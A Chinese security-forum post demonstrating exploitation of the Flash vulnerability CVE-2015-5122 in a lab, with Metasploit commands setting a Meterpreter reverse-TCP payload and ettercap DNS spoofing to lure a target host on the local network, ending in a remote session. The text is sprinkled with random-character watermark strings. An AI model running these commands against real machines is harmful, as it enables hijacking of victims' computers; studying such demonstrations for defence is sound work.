找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1539|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

4 e5 |, k: k: z1 j- O! W 二、cve2015-5122漏洞实例演示虚拟机 ' @& Z8 c- P2 p7 J1 k! t

/ Y/ _9 X6 R$ f$ c4 r6 z

6 A3 n( |+ W8 m% h8 _& G- g   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: . j8 m- B: T- f' v& {; O# |

) d& O7 H0 a: Y; B7 q' r

7 }$ X4 @! P, ^2 V2 I+ s search cve-2015-5122如图: y) x* E& N. Q% L- D+ j! Y& j

0 Z% c& R" v1 M6 y* x& v1 X7 K

: K: ?4 t; i$ c1 p6 w   , i1 M5 O. F4 a5 M7 j

; W/ e" ?2 \0 |: |5 m* t

5 T0 ~) J+ e6 I# R0 C. e$ r; l 下面我们敲如下命令: + v* o6 @' X6 m8 q0 C1 ?

n4 `8 g3 ^! u' d1 w' A# k( t3 W+ J' [

: X. p1 n' |# x6 ?6 e& X4 } use exploit/multi/browser/adobe_flash_opaque_background_uaf : [# H1 j. B$ L+ T

% ?8 z3 |% [ f

y% Y$ x, p8 @. I% x) b' _2 o9 g set PAYLOAD windows/meterpreter/reverse_tcp * m" c9 b" B- X

4 N* G; ^3 k' _* [

( p5 T2 f5 t+ x2 a5 J6 y" A set LHOST 192.168.0.109 " l( X/ f* g% ^( u) g0 i4 Q4 d; S( s* K

% A& L$ N5 q7 n0 R5 r

/ [9 T* i" l; x+ I6 X, {" n4 M# i set URIPATH /                        /*根目录*/ / @* M! D/ b# A7 v F' V; |" ]

) U& {& ]# _0 t7 _1 ?" O& k& F

, h0 A4 w! j. e) }" o. c set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 5 K2 P7 Z. s% A- B8 Y: j4 [% |

6 }6 O* l1 v3 u: q% P' x+ ?( V# N

5 `: b: y2 g8 m4 i5 q* D0 d set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 9 H9 D0 Y! p# J% D7 V" i% n- f

2 y0 ?% q/ H2 n

! v/ F4 [! H* h4 b3 L! O: h- p 然后show options如图: 1 i. i7 o% y# z% |9 m# a* R2 d

. z( ~5 I; w; [+ O3 ?

( A/ G3 |0 K, a, U& N; o0 w   ! g4 \- `$ ~ S( q

' L3 C4 `& [$ c/ H

" o. I, ~& t6 W l; ~3 ^6 w 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
: Y7 y9 L3 O' y0 r" O
; ~& T& P9 b V7 D

. v9 c7 \) |6 E! `# c& ^3 s

8 ^, N, q/ D3 B4 X+ j# A6 }- H5 i2 q. g; j 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 7 R7 X1 c: N: K& C

6 r: _6 z% {# S: w& y$ d/ {

# L( V. g, a0 N% V; ^) @" u$ `0 | Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf % E+ A% ~+ i! ?" U

( l" ^1 n0 j$ E# H' P$ R+ f

5 F3 T6 w w( ^* r   + o' P1 f: ~: t6 F, z. G) |

9 K: M7 O' M: A. F) g

+ R; q) ~2 T- \4 {; ]! h$ U 成功了,这时候我们断开ettercap,如图: , q6 T& H0 d; o2 ^& c! r) J/ N6 _

$ h1 c/ j- u: j( Z9 d

2 I* w; f. z6 K' j4 L, v% l' P9 V/ J   ) @+ Y% r0 W; P( P

8 }) R+ r% H! ^( d1 [! b- p0 {; D

/ v3 ?( @" i' ?0 Q Screenshot如图: ) g* T& T0 R& x& n7 z. g

- C+ A1 Y/ ?+ d$ V4 s' x

0 }9 b( {1 n- L5 ]2 _0 J9 z* @5 ~   ; T$ Z7 V0 a0 T/ G2 w+ T6 B6 ?

& ?* B/ K' y6 p8 s9 y3 g, u* G

; ^; {( @9 T5 J5 v9 R/ z8 n/ { 3 c' y+ ]$ p5 a8 D# Q2 Y) I

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表